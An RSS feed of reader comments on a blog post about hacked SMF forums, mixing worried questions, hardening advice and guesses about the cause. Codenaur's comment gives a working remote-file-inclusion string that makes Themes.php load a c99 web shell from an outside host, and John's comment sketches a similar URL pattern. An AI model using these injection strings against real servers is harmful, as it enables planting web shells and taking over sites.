<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: All Your SMF Forums Have Been Hacked. Have a Nice Day.</title>
	<atom:link href="http://www.devside.net/blog/smf-exploit-like-phpbb-hack/feed" rel="self" type="application/rss+xml" />
	<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack</link>
	<description>Linux, Windows, MacOS? Who cares. Just give me something that works!</description>
	<pubDate>Sun, 27 Jul 2008 00:56:54 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
		<item>
		<title>By: Purepker</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-5017</link>
		<dc:creator>Purepker</dc:creator>
		<pubDate>Tue, 22 Jul 2008 01:08:59 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-5017</guid>
		<description>So what do we do, delete the forums?? IS this serious like getting your info like credit card number, address of your house and stuff?? please let me know sap. 

Thanks</description>
		<content:encoded><![CDATA[<p>So what do we do, delete the forums?? IS this serious like getting your info like credit card number, address of your house and stuff?? please let me know sap. </p>
<p>Thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: John</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4511</link>
		<dc:creator>John</dc:creator>
		<pubDate>Wed, 07 May 2008 07:46:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4511</guid>
		<description>Retarded script-kiddies are trying this on old versions of SMF... 

thedomain.com/index.php?action=http_full_url_to_txt_with_php_inside</description>
		<content:encoded><![CDATA[<p>Retarded script-kiddies are trying this on old versions of SMF&#8230; </p>
<p>thedomain.com/index.php?action=http_full_url_to_txt_with_php_inside</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Codenaur</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4500</link>
		<dc:creator>Codenaur</dc:creator>
		<pubDate>Mon, 28 Apr 2008 08:43:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4500</guid>
		<description>A few things I would like to clear up, The shell is encoded with bace64 to get round mod_security. Now I know this is a OLD blog post, but I think he exploited a remote file inclusion exploit in the themes directory(thats why he opened the readme). The exploit is;

/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?

Now theres not official patch for this yet, But the exploit should be unable to work if you have register_globles enabled.</description>
		<content:encoded><![CDATA[<p>A few things I would like to clear up, The shell is encoded with bace64 to get round mod_security. Now I know this is a OLD blog post, but I think he exploited a remote file inclusion exploit in the themes directory(thats why he opened the readme). The exploit is;</p>
<p>/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?</p>
<p>Now theres not official patch for this yet, But the exploit should be unable to work if you have register_globles enabled.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: daisy</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4483</link>
		<dc:creator>daisy</dc:creator>
		<pubDate>Fri, 11 Apr 2008 12:57:43 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4483</guid>
		<description>the C99madShell is a common exploit script used against any system which allows attachments or uploads, make sure that you do not allow uploads with php* extensions to any of your systems or you leave yourself open to this attack which can be used to root your server or to make your server attack other servers</description>
		<content:encoded><![CDATA[<p>the C99madShell is a common exploit script used against any system which allows attachments or uploads, make sure that you do not allow uploads with php* extensions to any of your systems or you leave yourself open to this attack which can be used to root your server or to make your server attack other servers</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daw Hosting Blog</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4479</link>
		<dc:creator>Daw Hosting Blog</dc:creator>
		<pubDate>Fri, 04 Apr 2008 16:34:37 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-4479</guid>
		<description>Hey,

I have red the aricle very, very carefully because I' thinking of having SMF installed as a forum on one of my accounts. Do you think that it is not safer than any other Open Source freeware forum software?</description>
		<content:encoded><![CDATA[<p>Hey,</p>
<p>I have red the aricle very, very carefully because I&#8217; thinking of having SMF installed as a forum on one of my accounts. Do you think that it is not safer than any other Open Source freeware forum software?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: haha</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2901</link>
		<dc:creator>haha</dc:creator>
		<pubDate>Sun, 27 Jan 2008 22:05:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2901</guid>
		<description>"cleaver"? you mean "clever".

FFS, get a dictionary.</description>
		<content:encoded><![CDATA[<p>&#8220;cleaver&#8221;? you mean &#8220;clever&#8221;.</p>
<p>FFS, get a dictionary.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: kcho</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2784</link>
		<dc:creator>kcho</dc:creator>
		<pubDate>Sat, 24 Nov 2007 10:18:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2784</guid>
		<description>i have something like a year using SMF and the real problem what i find  in it is what some mods makes the code crash sometimes, but in origin is a good forum, simple machines team make their best to give us a free solution.</description>
		<content:encoded><![CDATA[<p>i have something like a year using SMF and the real problem what i find  in it is what some mods makes the code crash sometimes, but in origin is a good forum, simple machines team make their best to give us a free solution.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Fotis Evangelou</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2524</link>
		<dc:creator>Fotis Evangelou</dc:creator>
		<pubDate>Thu, 25 Oct 2007 15:58:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2524</guid>
		<description>We had the same issue as well.

The suspicious readme.php file was on the root path of SMF, not the themes folder. So I guess it's not related to themes.

We've added the php security controls you mentioned and now we wait.

Thanks for your insights man. ;)</description>
		<content:encoded><![CDATA[<p>We had the same issue as well.</p>
<p>The suspicious readme.php file was on the root path of SMF, not the themes folder. So I guess it&#8217;s not related to themes.</p>
<p>We&#8217;ve added the php security controls you mentioned and now we wait.</p>
<p>Thanks for your insights man. ;)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: poncheg</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2388</link>
		<dc:creator>poncheg</dc:creator>
		<pubDate>Wed, 17 Oct 2007 19:19:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2388</guid>
		<description>i say stupid ADMIN :)</description>
		<content:encoded><![CDATA[<p>i say stupid ADMIN :)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Motoko-chan</title>
		<link>http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2242</link>
		<dc:creator>Motoko-chan</dc:creator>
		<pubDate>Tue, 02 Oct 2007 20:39:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.devside.net/blog/smf-exploit-like-phpbb-hack#comment-2242</guid>
		<description>Every software has had security issues. If they haven't it is just because it hasn't happened yet.

Anyway, this particular issue appears to be related to a bug that was fixed in the latest 1.0 and 1.1 releases.</description>
		<content:encoded><![CDATA[<p>Every software has had security issues. If they haven&#8217;t it is just because it hasn&#8217;t happened yet.</p>
<p>Anyway, this particular issue appears to be related to a bug that was fixed in the latest 1.0 and 1.1 releases.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
